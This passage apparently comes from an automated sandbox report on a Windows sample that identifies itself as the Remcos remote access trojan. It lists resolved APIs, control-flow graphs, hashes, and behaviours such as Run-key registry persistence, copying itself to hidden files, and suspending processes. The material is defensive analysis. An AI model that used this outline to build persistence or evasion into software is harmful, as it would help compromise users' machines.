                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                  • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                                  • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                  • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebda call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 99 40ebdf-40ebe3 69->99 79 40ec06-40ec1c call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 95 40ec21-40ec25 79->95 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 95->80 98 40ec27-40ec3d call 401fab call 4139e4 95->98 98->80 99->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 99->102 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 118 40ec79-40ec7b 109->118 121 40ec87-40ec9a call 401e65 call 401fab 118->121 122 40ec7d-40ec82 call 407773 call 40729b 118->122 121->108 141 40ec9c-40eca2 121->141 122->121 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40ed9c call 401e65 call 401fab call 401e65 call 401fab call 40da6f 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee40 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 272 40ee45-40ee48 183->272 210 40ee8c 193->210 211 40ee7f-40ee8a call 436f10 193->211 248 40eda1-40edb6 call 401f13 call 401f09 203->248 217 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 210->217 211->217 217->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 217->288 286 40f017-40f019 234->286 287 40effc 234->287 248->178 272->193 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 356 40f194-40f1a7 call 401e65 call 401fab 347->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 415 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->415 416 40f2c2-40f2c7 413->416 417 40f307-40f322 call 401fab call 41353a 413->417 415->417 416->415 417->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 417->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: (TG$,aF$,aF$0SG$0SG$0Q$Access Level: $Administrator$C:\Users\user\Desktop\1.exe$Exe$Exe$HSG$HSG$HVP$Inj$Remcos Agent initialized$Software\$User$`SG$del$del$exepath$licence$license_code.txt$tMG
                                                  • API String ID: 2830904901-146446188
                                                  • Opcode ID: f691c7f85091ee0464809932c8ca2165e847c5a62d04dccbaa8eb361f6d7295f
                                                  • Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
                                                  • Opcode Fuzzy Hash: f691c7f85091ee0464809932c8ca2165e847c5a62d04dccbaa8eb361f6d7295f
                                                  • Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E

                                                  Control-flow Graph

                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,0Q,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\1.exe,00000000,00000000,00000000,00000000,00000000,?,0Q,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\1.exe,00000000,00000000), ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0Q,0000000E), ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 0Q$6$C:\Users\user\Desktop\1.exe$HVP$del$open$xdF
                                                  • API String ID: 1579085052-122913964
                                                  • Opcode ID: ae5f2caed3e441c0fd45a0837fa60a24ce903f8dbea8dc1d8d7212bc14538997
                                                  • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                                  • Opcode Fuzzy Hash: ae5f2caed3e441c0fd45a0837fa60a24ce903f8dbea8dc1d8d7212bc14538997
                                                  • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: f08f4e18885b2f7615637fa2a30393de658789fc74a414425b86656352cc7e9c
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: f08f4e18885b2f7615637fa2a30393de658789fc74a414425b86656352cc7e9c
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,0Q,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$0Q$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-2806019533
                                                  • Opcode ID: 0efa9772f7d1876e206e03f8c0545449b486e46bbe92a937a0a903a088eeb361
                                                  • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                                  • Opcode Fuzzy Hash: 0efa9772f7d1876e206e03f8c0545449b486e46bbe92a937a0a903a088eeb361
                                                  • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 656 41384f-413862 RegCreateKeyW 657 4138a1 656->657 658 413864-41389f call 40247c call 401f04 RegSetValueExW RegCloseKey 656->658 660 4138a3-4138b1 call 401f09 657->660 658->660
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                  • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,HVP,759237E0,?), ref: 00413888
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,HVP,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                  • HVP, xrefs: 0041384F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: HVP$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 1818849710-1875333545
                                                  • Opcode ID: 0a8972419b2caf81fd6b92deeec17a599c7257cd425df413d9266cd32e11a416
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: 0a8972419b2caf81fd6b92deeec17a599c7257cd425df413d9266cd32e11a416
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 666 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: 0SG
                                                  • API String ID: 1925916568-2718230054
                                                  • Opcode ID: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                                  • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                                  • Opcode Fuzzy Hash: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                                  • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 669 4135e1-41360d RegOpenKeyExA 670 413642 669->670 671 41360f-413637 RegQueryValueExA RegCloseKey 669->671 672 413644 670->672 671->672 673 413639-413640 671->673 674 413649-413655 call 402093 672->674 673->674
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                  • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e238dbc9e2073977e027648aa5af93dfac856dda57be128719874f60decc0002
                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                  • Opcode Fuzzy Hash: e238dbc9e2073977e027648aa5af93dfac856dda57be128719874f60decc0002
                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 677 413584-4135ac RegOpenKeyExA 678 4135db 677->678 679 4135ae-4135d9 RegQueryValueExA RegCloseKey 677->679 680 4135dd-4135e0 678->680 679->680
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
